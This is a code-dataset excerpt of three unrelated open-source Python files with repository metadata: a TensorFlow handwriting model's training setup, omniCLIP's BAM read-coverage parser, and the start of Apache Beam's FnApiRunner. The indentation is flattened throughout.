[x1_data, x2_data, eos_data] = tf.split(flat_target_data, 3, 1) #we might as well split these now
[self.eos, self.pi, self.mu1, self.mu2, self.sigma1, self.sigma2, self.rho] = get_mdn_coef(output)
loss = get_loss(self.pi, x1_data, x2_data, eos_data, self.mu1, self.mu2, self.sigma1, self.sigma2, self.rho, self.eos)
self.cost = loss / (self.batch_size * self.tsteps)
# ----- bring together all variables and prepare for training
self.learning_rate = tf.Variable(0.0, trainable=False)
self.decay = tf.Variable(0.0, trainable=False)
self.momentum = tf.Variable(0.0, trainable=False)
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars), self.grad_clip)
if args.optimizer == 'adam':
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
elif args.optimizer == 'rmsprop':
self.optimizer = tf.train.RMSPropOptimizer(learning_rate=self.learning_rate, decay=self.decay, momentum=self.momentum)
else:
raise ValueError("Optimizer type not recognized")
self.train_op = self.optimizer.apply_gradients(zip(grads, tvars))
# ----- some TensorFlow I/O
self.sess = tf.InteractiveSession()
self.saver = tf.train.Saver(tf.global_variables())
self.sess.run(tf.global_variables_initializer())
# ----- for restoring previous models
def try_load_model(self, save_path):
load_was_success = True # yes, I'm being optimistic
global_step = 0
try:
save_dir = '/'.join(save_path.split('/')[:-1])
ckpt = tf.train.get_checkpoint_state(save_dir)
load_path = ckpt.model_checkpoint_path
self.saver.restore(self.sess, load_path)
except:
self.logger.write("no saved model to load. starting new session")
load_was_success = False
else:
self.logger.write("loaded model: {}".format(load_path))
self.saver = tf.train.Saver(tf.global_variables())
global_step = int(load_path.split('-')[-1])
return load_was_success, global_step
|
Charleo85/ml_project
|
resource/scribe/model.py
|
Python
|
mit
| 10,496
|
[
"Gaussian"
] |
4a6ac518c568bac94dcca650aec0fa95b9b37e0a6eb35686ab925be3fb3fec61
|
"""
omniCLIP is a CLIP-Seq peak caller
Copyright (C) 2017 Philipp Boss
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import numpy as np
import re
import warnings
def GetRawCoverageFromRegion(
SamReader, Chr, Start, Stop, Collapse=False, CovType='coverage',
Genome='', legacy=True, mask_flank_variants=3, max_mm=2,
rev_strand=None, ign_out_rds=False, gene_strand=0):
"""Extract coverage from a BAM-file.
This function gets from a BAM-file the coverage and returns it as a sparse
vector for each chromosome and strand.
"""
# Initiate nucleotide lookup
NuclDict = {'A': 0, 'C': 1, 'G': 2, 'T': 3, 'D': 4}
# Prepare regular expression
r = re.compile('([\\^]*[ACGTN]+)[0]*')
# Compute Length of the region
RegionLength = Stop - Start
# Initialise the length vectors
ret_arrays = dict()
ret_arrays['variants'] = np.zeros((5, RegionLength), dtype=np.int32)
ret_arrays['read-ends'] = np.zeros((2, RegionLength), dtype=np.int32)
ret_arrays['coverage'] = np.zeros((1, RegionLength), dtype=np.int32)
# Modify gene_strand if the reads are coming from the reverse strand
if rev_strand is not None:
if rev_strand == 0:
gene_strand *= -1 # Swap the strand
# Iterate over Reads
iter = SamReader.fetch(Chr, Start, Stop)
for CurrRead in iter:
# Check for mismatches
if CurrRead.get_tag('NM') > max_mm:
continue
# Check for position whithin gene boundaries
CurrReadstart = CurrRead.pos - Start
if ign_out_rds:
LastPos = (CurrReadstart
+ sum([e[1] for e in CurrRead.cigar if e[0] != 4])
- 1)
if (CurrReadstart < 0) or (LastPos > Stop - Start):
continue
# Check whether the read strand matches else skip this read
if rev_strand is not None:
# Check if read is paired
if CurrRead.flag & 1:
if gene_strand == -1:
# CurrRead.flag & 16 means read is on reverse strand
# CurrRead.flag & 32 means mate read is on reverse strand
# CurrRead.flag & 64 means read is first in pair
# CurrRead.flag & 128 means read is second in pair
if ((CurrRead.flag & 16) > 0) & ((CurrRead.flag & 64) > 0):
continue
if ((CurrRead.flag & 16) == 0) & ((CurrRead.flag & 128) > 0):
continue
else:
if ((CurrRead.flag & 16) > 0) & ((CurrRead.flag & 128) > 0):
continue
if ((CurrRead.flag & 16) == 0) & ((CurrRead.flag & 64) > 0):
continue
else:
if gene_strand == -1:
if ((CurrRead.flag & 16) > 0):
continue
else:
if ((CurrRead.flag & 16) == 0):
continue
# Compute relative positions of read
CurrReadstart = CurrRead.pos - Start
FirstPos = CurrReadstart
LastPos = FirstPos + sum([e[1] for e in CurrRead.cigar if e[0] != 4])
# Check ho many reads the current read represents (Collapsing)
if Collapse:
Mult = CurrRead.qname.split('-')
if len(Mult) == 1:
raise Exception('Error: Collapsing of read: ' + CurrRead.qname)
Mult = int(Mult[-1])
else:
Mult = 1
# Processing for variants
if 'variants' in CovType:
GlobalVariantPos = GetVariantsFromRead(CurrRead, r)
# Transform letters into numbers, A - 0, C - 1, G - 2, T - 3
for e in GlobalVariantPos:
if e[1] == 'N':
continue
# Check if variant falls into flanks
if (e[0] - Start) < (FirstPos + mask_flank_variants):
continue
elif (e[0] - Start) > (LastPos - 1 - mask_flank_variants):
continue
# Check whether the variant lies outside of the gene
if e[0] - Start < 0 or e[0] - Start >= RegionLength:
continue
# Process the variant
ret_arrays['variants'][NuclDict[e[1]], e[0] - Start] += Mult
# Processing for read extremities
if 'read-ends' in CovType:
if CurrRead.flag & 1:
# Check if the read is paired end.
# If yes chose the outer ends as ends.
if FirstPos >= 0:
if ((CurrRead.flag & 128) > 0) & ((CurrRead.flag & 32) > 0):
ret_arrays['read-ends'][0, CurrReadstart] += Mult
if ((CurrRead.flag & 64) > 0) & ((CurrRead.flag & 32) > 0):
ret_arrays['read-ends'][1, CurrReadstart] += Mult
if LastPos < RegionLength:
if ((CurrRead.flag & 16) > 0) & ((CurrRead.flag & 64) > 0):
ret_arrays['read-ends'][1, LastPos - 1] += Mult
if ((CurrRead.flag & 16) > 0) & ((CurrRead.flag & 128) > 0):
ret_arrays['read-ends'][0, LastPos - 1] += Mult
else:
if FirstPos >= 0:
if ((CurrRead.flag & 16) > 0):
ret_arrays['read-ends'][1, CurrReadstart] += Mult
else:
ret_arrays['read-ends'][0, CurrReadstart] += Mult
if LastPos < RegionLength:
if ((CurrRead.flag & 16) > 0):
ret_arrays['read-ends'][0, LastPos - 1] += Mult
else:
ret_arrays['read-ends'][1, LastPos] += Mult
# Processing for coverage
for cig in CurrRead.cigar:
# Check which type to get the coverage for
if cig[0] == 0:
_start = max(0, CurrReadstart)
_end = min(RegionLength, max(0, CurrReadstart + cig[1]))
ret_arrays['coverage'][0, _start:_end] += Mult
if cig[0] != 4:
CurrReadstart += cig[1]
return ret_arrays
def GetVariantsFromRead(CurrRead, r):
"""Parse variants from read.
Takes a pySAM read and returns variants based on the MD Tag the Variants
and their absolute positions.
"""
# Get the sequence
Seq = CurrRead.seq
# Get the MD tag
Tag = CurrRead.get_tag('MD')
# Split the string
SplitTag = [e for e in r.split(Tag) if len(e) > 0]
if len(SplitTag) == 1:
return []
# Convert the groups to a list of local positions and nucleotides
TempPos = 0
Pos = []
for i in range(0, len(SplitTag)):
if SplitTag[i].isdigit():
# Increase the counter by the number of positions where there is no
# mismatch
TempPos += int(SplitTag[i])
else:
if SplitTag[i][0] == '^': # Check if it is a deletion
continue
else:
for l in range(len(SplitTag[i])):
Pos.append([TempPos, Seq[TempPos]])
TempPos += 1
# Convert the local positions from Pos to global positions.
CurrGlobalPos = CurrRead.pos
GlobalPos = []
# Iterate over the segments of the cigar string
for cig in CurrRead.cigar:
# Split the positions in Pos into the ones faling into the current
# CIGAR segement and the rest
# Sequence match
if cig[0] == 0:
CurrSeg = [e for e in Pos if e[0] < cig[1]]
Pos = [[e[0] - cig[1], e[1]] for e in Pos if e[0] >= cig[1]]
for e in CurrSeg:
GlobalPos.append([CurrGlobalPos + e[0], e[1]])
CurrGlobalPos += cig[1]
# Insertion to the reference
elif cig[0] == 1:
continue
# Deletion from the reference
elif cig[0] == 2:
for temp_pos in range(cig[1]):
GlobalPos.append([CurrGlobalPos + temp_pos, 'D'])
CurrGlobalPos += cig[1]
continue
# Skipped region from the reference
elif cig[0] == 3:
CurrGlobalPos += cig[1]
# Soft clipping (clipped sequences present in SEQ)
elif cig[0] == 4:
continue
# Hard clipping (clipped sequences NOT present in SEQ)
elif cig[0] == 5:
continue
CurrGlobalPos += cig[1]
# Padding (silent deletion from padded reference)
elif cig[0] == 6:
continue
# Sequence match
elif cig[0] == 7:
CurrSeg = [e for e in Pos if e[0] < cig[1]]
Pos = [[e[0] - cig[1], e[1]] for e in Pos if e[0] >= cig[1]]
for e in CurrSeg:
GlobalPos.append([CurrGlobalPos + e[0], e[1]])
CurrGlobalPos += cig[1]
# Sequence mismatch
elif cig[0] == 8:
CurrSeg = [e for e in Pos if e[0] < cig[1]]
Pos = [[e[0] - cig[1], e[1]] for e in Pos if e[0] >= cig[1]]
for e in CurrSeg:
GlobalPos.append([CurrGlobalPos + e[0], e[1]])
CurrGlobalPos += cig[1]
else:
warnings.warn("Encountered unhandled CIGAR character in read "
+ CurrRead.qname)
CurrGlobalPos += cig[1]
return GlobalPos
|
philippdre/omniCLIP
|
omniCLIP/data_parsing/GetCoverageFromBam.py
|
Python
|
gpl-3.0
| 10,108
|
[
"pysam"
] |
c9721cec0c86c23e16579c0709f26c60afb1f2669f3c9624c6f9c669e8a3cb02
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import logging
import os
import queue
import subprocess
import sys
import threading
import time
from builtins import object
from concurrent import futures
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam import metrics
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricKey
from apache_beam.metrics.execution import MetricsEnvironment
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
IMPULSE_BUFFER = b'impulse'
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
_DONE = object()
def __init__(self):
self._push_queue = queue.Queue()
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._started = False
self._uid_counter = 0
def Control(self, iterator, context):
self._inputs = iterator
# Note: We only support one client for now.
self._read_thread.start()
self._started = True
while True:
to_push = self._push_queue.get()
if to_push is self._DONE:
return
yield to_push
def _read(self):
for data in self._inputs:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, item):
if item is self._DONE:
future = None
else:
if not item.instruction_id:
self._uid_counter += 1
item.instruction_id = 'control_%s' % self._uid_counter
future = ControlFuture(item.instruction_id)
self._futures_by_id[item.instruction_id] = future
self._push_queue.put(item)
return future
def done(self):
self.push(self._DONE)
# Can't join a thread before it's started.
while not self._started:
time.sleep(.01)
self._read_thread.join()
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def __iter__(self):
if not self._grouped_output:
output_stream = create_OutputStream()
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(None).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for encoded_key, windowed_values in self._table.items():
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream, True)
self._grouped_output = [output_stream.get()]
self._table = None
return iter(self._grouped_output)
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, side_input_data, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if side_input_data.access_pattern == common_urns.side_inputs.ITERABLE.urn:
self._kv_extrator = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif side_input_data.access_pattern == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extrator = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % side_input_data.access_pattern)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
key, value = self._kv_extrator(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(self, use_grpc=False, sdk_harness_factory=None, bundle_repeat=0):
"""Creates a new Fn API Runner.
Args:
use_grpc: whether to use grpc or simply make in-process calls
defaults to False
sdk_harness_factory: callable used to instantiate customized sdk harnesses
typcially not set by users
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._use_grpc = use_grpc
if sdk_harness_factory and not use_grpc:
raise ValueError('GRPC must be used if a harness factory is provided.')
self._sdk_harness_factory = sdk_harness_factory
self._bundle_repeat = bundle_repeat
self._progress_frequency = None
self._profiler_factory = None
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline):
MetricsEnvironment.set_metrics_supported(False)
RuntimeValueProvider.set_runtime_options({})
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or pipeline._options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._profiler_factory = profiler.Profile.factory_from_options(
pipeline._options.view_as(pipeline_options.ProfilingOptions))
return self.run_via_runner_api(pipeline.to_runner_api())
def run_via_runner_api(self, pipeline_proto):
return self.run_stages(*self.create_stages(pipeline_proto))
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
logging.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-variable
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
# First define a couple of helpers.
def union(a, b):
# Minimize the number of distinct sets.
if not a or a == b:
return b
elif not b:
return a
else:
return frozenset.union(a, b)
class Stage(object):
"""A set of Transforms that can be sent to the worker for processing."""
def __init__(self, name, transforms,
downstream_side_inputs=None, must_follow=frozenset()):
self.name = name
self.transforms = transforms
self.downstream_side_inputs = downstream_side_inputs
self.must_follow = must_follow
self.timer_pcollections = []
def __repr__(self):
must_follow = ', '.join(prev.name for prev in self.must_follow)
downstream_side_inputs = ', '.join(
str(si) for si in self.downstream_side_inputs)
return "%s\n %s\n must follow: %s\n downstream_side_inputs: %s" % (
self.name,
'\n'.join(["%s:%s" % (transform.unique_name, transform.spec.urn)
for transform in self.transforms]),
must_follow,
downstream_side_inputs)
def can_fuse(self, consumer):
def no_overlap(a, b):
return not a.intersection(b)
return (
not self in consumer.must_follow
and not self.is_flatten() and not consumer.is_flatten()
and no_overlap(self.downstream_side_inputs, consumer.side_inputs()))
def fuse(self, other):
return Stage(
"(%s)+(%s)" % (self.name, other.name),
self.transforms + other.transforms,
union(self.downstream_side_inputs, other.downstream_side_inputs),
union(self.must_follow, other.must_follow))
def is_flatten(self):
return any(transform.spec.urn == common_urns.primitives.FLATTEN.urn
for transform in self.transforms)
def side_inputs(self):
for transform in self.transforms:
if transform.spec.urn == common_urns.primitives.PAR_DO.urn:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for side_input in payload.side_inputs:
yield transform.inputs[side_input]
def has_as_main_input(self, pcoll):
for transform in self.transforms:
if transform.spec.urn == common_urns.primitives.PAR_DO.urn:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
local_side_inputs = payload.side_inputs
else:
local_side_inputs = {}
for local_id, pipeline_id in transform.inputs.items():
if pcoll == pipeline_id and local_id not in local_side_inputs:
return True
def deduplicate_read(self):
seen_pcolls = set()
new_transforms = []
for transform in self.transforms:
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
pcoll = only_element(list(transform.outputs.items()))[1]
if pcoll in seen_pcolls:
continue
seen_pcolls.add(pcoll)
new_transforms.append(transform)
self.transforms = new_transforms
# Some helper functions.
def add_or_get_coder_id(coder_proto):
for coder_id, coder in pipeline_components.coders.items():
if coder == coder_proto:
return coder_id
new_coder_id = unique_name(pipeline_components.coders, 'coder')
pipeline_components.coders[new_coder_id].CopyFrom(coder_proto)
return new_coder_id
def windowed_coder_id(coder_id, window_coder_id):
proto = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.WINDOWED_VALUE.urn)),
component_coder_ids=[coder_id, window_coder_id])
return add_or_get_coder_id(proto)
safe_coders = {}
def length_prefix_unknown_coders(pcoll, pipeline_components):
"""Length prefixes coder for the given PCollection.
Updates pipeline_components to have a length prefixed coder for
every component coder within the PCollection that is not understood
natively by the runner. Also populates the safe_coders map with
a corresponding runner side coder which is also length prefixed but
compatible for the runner to instantiate.
"""
good_coder_urns = set(
value.urn for value in common_urns.coders.__dict__.values())
coders = pipeline_components.coders
for coder_id, coder_proto in coders.items():
if coder_proto.spec.spec.urn == common_urns.coders.BYTES.urn:
bytes_coder_id = coder_id
break
else:
bytes_coder_id = unique_name(coders, 'bytes_coder')
pipeline_components.coders[bytes_coder_id].CopyFrom(
beam.coders.BytesCoder().to_runner_api(None))
coder_substitutions = {}
def wrap_unknown_coders(coder_id, with_bytes):
if (coder_id, with_bytes) not in coder_substitutions:
wrapped_coder_id = None
coder_proto = coders[coder_id]
if coder_proto.spec.spec.urn == common_urns.coders.LENGTH_PREFIX.urn:
coder_substitutions[coder_id, with_bytes] = (
bytes_coder_id if with_bytes else coder_id)
elif coder_proto.spec.spec.urn in good_coder_urns:
wrapped_components = [wrap_unknown_coders(c, with_bytes)
for c in coder_proto.component_coder_ids]
if wrapped_components == list(coder_proto.component_coder_ids):
# Use as is.
coder_substitutions[coder_id, with_bytes] = coder_id
else:
wrapped_coder_id = unique_name(
coders,
coder_id + ("_bytes" if with_bytes else "_len_prefix"))
coders[wrapped_coder_id].CopyFrom(coder_proto)
coders[wrapped_coder_id].component_coder_ids[:] = [
wrap_unknown_coders(c, with_bytes)
for c in coder_proto.component_coder_ids]
coder_substitutions[coder_id, with_bytes] = wrapped_coder_id
else:
# Not a known coder.
if with_bytes:
coder_substitutions[coder_id, with_bytes] = bytes_coder_id
else:
wrapped_coder_id = unique_name(coders, coder_id + "_len_prefix")
len_prefix_coder_proto = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.LENGTH_PREFIX.urn)),
component_coder_ids=[coder_id])
coders[wrapped_coder_id].CopyFrom(len_prefix_coder_proto)
coder_substitutions[coder_id, with_bytes] = wrapped_coder_id
# This operation is idempotent.
if wrapped_coder_id:
coder_substitutions[wrapped_coder_id, with_bytes] = wrapped_coder_id
return coder_substitutions[coder_id, with_bytes]
new_coder_id = wrap_unknown_coders(pcoll.coder_id, False)
safe_coders[new_coder_id] = wrap_unknown_coders(pcoll.coder_id, True)
pcoll.coder_id = new_coder_id
# Now define the "optimization" phases.
def impulse_to_input(stages):
bytes_coder_id = add_or_get_coder_id(
beam.coders.BytesCoder().to_runner_api(None))
global_window_coder_id = add_or_get_coder_id(
beam.coders.coders.GlobalWindowCoder().to_runner_api(None))
globally_windowed_bytes_coder_id = windowed_coder_id(
bytes_coder_id, global_window_coder_id)
for stage in stages:
# First map Reads, if any, to Impulse + triggered read op.
for transform in list(stage.transforms):
if transform.spec.urn == common_urns.deprecated_primitives.READ.urn:
read_pc = only_element(transform.outputs.values())
read_pc_proto = pipeline_components.pcollections[read_pc]
impulse_pc = unique_name(
pipeline_components.pcollections, 'Impulse')
pipeline_components.pcollections[impulse_pc].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=impulse_pc,
coder_id=globally_windowed_bytes_coder_id,
windowing_strategy_id=read_pc_proto.windowing_strategy_id,
is_bounded=read_pc_proto.is_bounded))
stage.transforms.remove(transform)
# TODO(robertwb): If this goes multi-process before fn-api
# read is default, expand into split + reshuffle + read.
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Impulse',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.primitives.IMPULSE.urn),
outputs={'out': impulse_pc}))
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name,
spec=beam_runner_api_pb2.FunctionSpec(
urn=python_urns.IMPULSE_READ_TRANSFORM,
payload=transform.spec.payload),
inputs={'in': impulse_pc},
outputs={'out': read_pc}))
# Now map impulses to inputs.
for transform in list(stage.transforms):
if transform.spec.urn == common_urns.primitives.IMPULSE.urn:
stage.transforms.remove(transform)
stage.transforms.append(
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name,
spec=beam_runner_api_pb2.FunctionSpec(
urn=bundle_processor.DATA_INPUT_URN,
payload=IMPULSE_BUFFER),
outputs=transform.outputs))
yield stage
def lift_combiners(stages):
"""Expands CombinePerKey into pre- and post-grouping stages.
... -> CombinePerKey -> ...
becomes
... -> PreCombine -> GBK -> MergeAccumulators -> ExtractOutput -> ...
"""
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == common_urns.composites.COMBINE_PER_KEY.urn:
combine_payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.CombinePayload)
input_pcoll = pipeline_components.pcollections[only_element(
list(transform.inputs.values()))]
output_pcoll = pipeline_components.pcollections[only_element(
list(transform.outputs.values()))]
windowed_input_coder = pipeline_components.coders[
input_pcoll.coder_id]
element_coder_id, window_coder_id = (
windowed_input_coder.component_coder_ids)
element_coder = pipeline_components.coders[element_coder_id]
key_coder_id, _ = element_coder.component_coder_ids
accumulator_coder_id = combine_payload.accumulator_coder_id
key_accumulator_coder = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.KV.urn)),
component_coder_ids=[key_coder_id, accumulator_coder_id])
key_accumulator_coder_id = add_or_get_coder_id(key_accumulator_coder)
accumulator_iter_coder = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.ITERABLE.urn)),
component_coder_ids=[accumulator_coder_id])
accumulator_iter_coder_id = add_or_get_coder_id(
accumulator_iter_coder)
key_accumulator_iter_coder = beam_runner_api_pb2.Coder(
spec=beam_runner_api_pb2.SdkFunctionSpec(
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.coders.KV.urn)),
component_coder_ids=[key_coder_id, accumulator_iter_coder_id])
key_accumulator_iter_coder_id = add_or_get_coder_id(
key_accumulator_iter_coder)
precombined_pcoll_id = unique_name(
pipeline_components.pcollections, 'pcollection')
pipeline_components.pcollections[precombined_pcoll_id].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=transform.unique_name + '/Precombine.out',
coder_id=windowed_coder_id(
key_accumulator_coder_id, window_coder_id),
windowing_strategy_id=input_pcoll.windowing_strategy_id,
is_bounded=input_pcoll.is_bounded))
grouped_pcoll_id = unique_name(
pipeline_components.pcollections, 'pcollection')
pipeline_components.pcollections[grouped_pcoll_id].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=transform.unique_name + '/Group.out',
coder_id=windowed_coder_id(
key_accumulator_iter_coder_id, window_coder_id),
windowing_strategy_id=output_pcoll.windowing_strategy_id,
is_bounded=output_pcoll.is_bounded))
merged_pcoll_id = unique_name(
pipeline_components.pcollections, 'pcollection')
pipeline_components.pcollections[merged_pcoll_id].CopyFrom(
beam_runner_api_pb2.PCollection(
unique_name=transform.unique_name + '/Merge.out',
coder_id=windowed_coder_id(
key_accumulator_coder_id, window_coder_id),
windowing_strategy_id=output_pcoll.windowing_strategy_id,
is_bounded=output_pcoll.is_bounded))
def make_stage(base_stage, transform):
return Stage(
transform.unique_name,
[transform],
downstream_side_inputs=base_stage.downstream_side_inputs,
must_follow=base_stage.must_follow)
yield make_stage(
stage,
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Precombine',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.combine_components.COMBINE_PGBKCV.urn,
payload=transform.spec.payload),
inputs=transform.inputs,
outputs={'out': precombined_pcoll_id}))
yield make_stage(
stage,
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Group',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.primitives.GROUP_BY_KEY.urn),
inputs={'in': precombined_pcoll_id},
outputs={'out': grouped_pcoll_id}))
yield make_stage(
stage,
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/Merge',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.combine_components
.COMBINE_MERGE_ACCUMULATORS.urn,
payload=transform.spec.payload),
inputs={'in': grouped_pcoll_id},
outputs={'out': merged_pcoll_id}))
yield make_stage(
stage,
beam_runner_api_pb2.PTransform(
unique_name=transform.unique_name + '/ExtractOutputs',
spec=beam_runner_api_pb2.FunctionSpec(
urn=common_urns.combine_components
.COMBINE_EXTRACT_OUTPUTS.urn,
payload=transform.spec.payload),
inputs={'in': merged_pcoll_id},
outputs=transform.outputs))
else:
yield stage
def expand_gbk(stages):
"""Transforms each GBK into a write followed by a read.
"""
for stage in stages:
assert len(stage.transforms) == 1
transform = stage.transforms[0]
if transform.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for pcoll_id in transform.inputs.values():
length_prefix_unknown_coders(
pipeline_components.pcollections[pcoll_id], pipeline_components)
for pcoll_id in transform.outputs.values():
length_prefix_unknown_coders(
pipeline_components.pcollections[pcoll_id], pipeline_components)
# This is used later to correlate the read and write.
